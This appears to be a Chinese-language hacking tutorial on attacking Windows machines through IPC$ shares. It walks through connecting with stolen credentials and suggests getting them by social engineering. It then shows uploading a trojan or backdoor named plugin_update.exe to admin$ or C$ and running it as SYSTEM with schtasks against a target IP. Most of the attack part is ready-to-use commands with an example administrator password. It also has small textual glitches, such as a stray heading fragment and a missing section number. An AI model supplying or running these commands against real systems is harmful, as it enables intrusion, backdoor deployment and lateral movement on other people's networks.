1.关于Windows操作系统中的“共享”
在Windows操作系统中的共享有3类:普通共享、默认共享、IPC$共享,
-
普通共享:就是通常意义上的共享,即用户设置的共享目录、共享文件夹、共享分区等;
-
默认共享:Windows操作系统的隐含驱动器共享,通常有:
(1)驱动器共享:如
C$
、D$
,开启后可直接访问分区中资源;(2)系统管理共享
admin$
:通常指向C:\Windows
。 -
IPC$
共享:这实际不是共享,而是提供一种访问管道;IPC全称“Internet Process Connection”,顾名思义,是为了进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。
查看服务器所开放的共享,可使用命令:net share
2. 利用条件
- 开放了139、445端口;
- 目标开启
ipc$
文件共享; - 获取用户账号密码。
3.IPC连接建立与攻击尝试
- 首先,目标服务器上必须启用了
IPC$
,启用命令:net share IPC$
当然,目标服务器上启用的共享对入侵者而言,多多益善。
P.S. 删除IPC$
命令:net share IPC$ /del
- 在入侵者侧,首先须建立与目标服务的IPC管道连接,建立连接命令如下:
net use \\目标服务器IP地址\IPC$ "口令" /user:用户名
P.S. 如口令、用户名为空,则建立了所谓“空连接”,这种连接权限有限,仅为everyone级权限;因此,建议在通过社会工程等手段获取用户、口令后再尝试。
-
建立连接后,用
net share \\目标服务器IP地址
查看目标服务器所开放的共享资源,也可以直接尝试上传或访问某个共享(例如:admin$
)、确认是否有可以利用的资源或信息; -
尝试攻击:将木马或其他工具上传至目标服务器的共享目录,比如:
copy 工具.exe \\目标服务器\admin$
然后直接或定时(利用at命令)运行工具.exe,完成攻击。接建立与攻击尝试
# 查看目标机器时间
net time \\193.168.1.12
# 创建该时间之后的某个时刻自动执行任务,任务名 plugin_update
schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 16:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"
# 如果不想等,可以立即运行后门程序
schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
# 删除创建的任务
schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
5.常用命令
# 1.连接
net use \\193.168.1.12\ipc$ /user:administrator "1qaz@WSX"
# 2.查看连接情况
net use
# 3.查看目标主机共享资源
net view \\193.168.1.12
# 4.查看目标主机时间
net time \\193.168.1.12
# 5.查看目标主机的NetBIOS用户(自己本机也需开启)
nbtstat -A 193.168.1.12
# 6.删除连接
net use \\193.168.1.12\ipc$ /del
# 7.文件上传下载
copy plugin_update.exe \\193.168.1.12\c$\windows\temp\plugin_update.exe
(上传到目标的:c\windows\temp\目录下)
copy \\127.0.0.1\c$\test.exe c:\
(下载到本地c盘下)
# 8.创建计划任务
schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 1 6:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"
# 9.立即执行计划任务
schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
# 10.删除计划任务
schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"